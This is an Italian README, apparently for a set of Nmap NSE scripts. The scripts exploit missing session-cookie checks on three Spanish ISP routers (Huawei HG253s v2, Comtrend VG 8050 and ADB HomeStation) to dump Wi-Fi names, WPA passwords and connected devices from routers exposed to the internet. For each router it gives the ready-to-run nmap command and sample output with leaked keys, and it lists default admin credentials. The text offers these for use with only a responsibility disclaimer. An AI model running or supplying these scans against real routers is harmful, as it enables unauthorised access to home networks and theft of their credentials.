
Alcuni script NSE per cercare informazioni dai router
Alcuni script NSE per cercare informazioni dai router.
L'autore di questi script è VicenDominguez. Ha trovato il 0-Day su Huawei, io l'ho solo modificato per altri due.
L'autore di questo script non è responsabile del suo utilizzo.
#Huawei HG253s v2 Vodafone-Spagna sta iniziando a fornire in comodato d'uso un nuovo router Huawei HG253v2 ai clienti spagnoli. Questo nuovo router arriva con una nuova versione del firmware.
##Vulnerabilità Fondamentalmente, non valida il cookie di sessione in alcune pagine web di amministrazione. Quindi, è possibile ottenere informazioni direttamente da quegli URL su qualsiasi router esposto a internet.
##Utilizzo
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-vodafone-hua253s:
| SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
| Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX
#Comtrend VG 8050 Telefonica-Spagna sta iniziando a fornire in comodato d'uso un nuovo router Comtrend VG 8050 ai clienti spagnoli. Questo nuovo router arriva con una nuova versione del firmware. Questo bug è stato trovato da DaniLabs
##Vulnerabilità Fondamentalmente, non valida il cookie di sessione in alcune pagine web di amministrazione. Quindi, è possibile ottenere informazioni direttamente da quegli URL su qualsiasi router esposto a internet.
##Utilizzo
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-comtrend-vg-8050:
| SSID: MOVISTAR_XXX
| Cipher Algorithm: WPA
| Password WEP:
| Password WPA: gTU3NkXE44RYjuM2RrxM
| Password WPA2:
| Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X
#ADB P.DGA4001N a.k.a HomeStation Telefonica-Spagna sta iniziando a fornire in comodato d'uso un nuovo router ADB P.DGA4001N ai clienti spagnoli. Questo nuovo router arriva con una nuova versione del firmware. Questo bug è stato trovato da DaniLabs
##Vulnerabilità Fondamentalmente, non valida il cookie di sessione in alcune pagine web di amministrazione. Quindi, è possibile ottenere informazioni direttamente da quegli URL su qualsiasi router esposto a internet.
Le credenziali predefinite sono admin / 1234 ##Utilizzo
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-homestation:
| SSID: WLAN_HOME
| Cipher Algorithm: WEP
| Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X